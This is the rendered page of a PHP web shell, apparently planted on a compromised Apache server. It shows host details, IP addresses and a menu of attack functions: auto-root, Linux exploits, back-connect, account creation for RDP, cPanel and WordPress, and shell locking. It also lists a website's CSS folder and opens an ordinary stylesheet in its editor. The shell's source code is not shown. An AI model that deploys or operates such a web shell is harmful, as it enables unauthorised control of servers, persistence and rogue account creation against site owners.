Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mpc_emas /
public /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
fontawesome
[ DIR ]
drwxr-xr-x
fontawesome-5.5.0
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
animatedcheckbox.css
2.08
KB
-rw-r--r--
app.css
111.53
KB
-rw-r--r--
chat.css
93.17
KB
-rw-r--r--
daterangepicker.css
8.58
KB
-rw-r--r--
ddmenu.css
978
B
-rw-r--r--
fancycheckbox.css
582
B
-rw-r--r--
fancyradio.css
333
B
-rw-r--r--
fileinput.css
2.26
KB
-rw-r--r--
fullcalendar-custom.css
1.79
KB
-rw-r--r--
mega-menu.css
2
KB
-rw-r--r--
minusinputplus.css
1.22
KB
-rw-r--r--
mjmz.css
1.53
KB
-rw-r--r--
multiselectdropdown.css
1.63
KB
-rw-r--r--
select2-fixed-custom.css
298
B
-rw-r--r--
store(
15.37
KB
-rw-r--r--
switchcheckbox.css
7.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : animatedcheckbox.css
//== Checkbox // //## // Animated Checkbox // // Animated checkboxes will use a similar structure as the Bootstrap's default checkboxes. .checkbox-animated { position: relative; margin-top: 10px; margin-bottom: 10px; input[type=checkbox] { display: none; &:disabled ~ label .box { border-color: #777; background-color: #E6E6E6; } &:disabled ~ label .check { border-color: #777; } &:checked ~ label .box { opacity: 0; -webkit-transform: scale(0) rotate(-180deg); -moz-transform: scale(0) rotate(-180deg); transform: scale(0) rotate(-180deg); } &:checked ~ label .check { opacity:1; -webkit-transform: scale(1) rotate(45deg); -moz-transform: scale(1) rotate(45deg); transform: scale(1) rotate(45deg); } } label { cursor: pointer; padding-left: 28px; font-weight: normal; margin-bottom: 0; & span { display: block; position: absolute; left: 0; -webkit-transition-duration: 0.3s; -moz-transition-duration: 0.3s; transition-duration: 0.3s; } & .box { border: 2px solid #000; height: 20px; width: 20px; z-index: 888; -webkit-transition-delay: 0.2s; -moz-transition-delay: 0.2s; transition-delay: 0.2s; } & .check { top: -7px; left: 6px; width: 12px; height: 24px; border: 2px solid #BADA55; border-top: none; border-left: none; opacity:0; z-index:888; -webkit-transform: rotate(180deg); -moz-transform: rotate(180deg); transform: rotate(180deg); -webkit-transition-delay: 0.3s; -moz-transition-delay: 0.3s; transition-delay: 0.3s; } } } .checkbox-animated-inline { .checkbox-animated(); &.checkbox-animated-inline { display: inline-block; & + .checkbox-animated-inline { margin-left: 10px; } } }
Close